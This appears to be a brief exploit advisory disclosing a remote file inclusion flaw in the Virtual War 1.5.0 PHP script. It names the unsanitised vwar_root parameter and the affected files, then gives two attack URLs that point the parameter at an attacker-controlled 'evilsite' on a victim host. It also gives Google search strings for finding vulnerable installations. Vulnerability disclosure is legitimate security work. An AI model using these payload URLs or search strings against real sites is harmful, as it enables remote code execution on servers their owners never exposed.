Virtual War File inclusion --------------------------------- Site:http://www.vwar.de/ Demo:http://www.vwar.de/demo/ --------------------------------------- File Ýnclusion // get functions $vwar_root = "./"; require ($vwar_root . "includes/functions_common.php"); require ($vwar_root . "includes/functions_front.php"); Vwar_root parameter File inclusion Aut File war.php,stats.php,news.php,joinus.php,challenge.php,calendar.php,member.php,popup.php and all admin folder files --------------------------------------- example 1) http://victim.com/path/admin/admin.php?vwar_root=http://evilsite 2)(phpnuke module) http://victim.com/path/modules/vwar/admin/admin.php?vwar_root=http://evilsite ----------------------------------------- Credit:Liz0ziM E-mail:liz0@xxxxxxxxxxx Site:www.biyo.tk www.biyosecurity.be ----------------------------------------- google: "Powered by: Virtual War v1.5.0" inurl:"modules.php?name=vwar" ------------------------------------- Source: http://www.blogcu.com/Liz0ziM/431925/ http://liz0zim.no-ip.org/vwar.txt
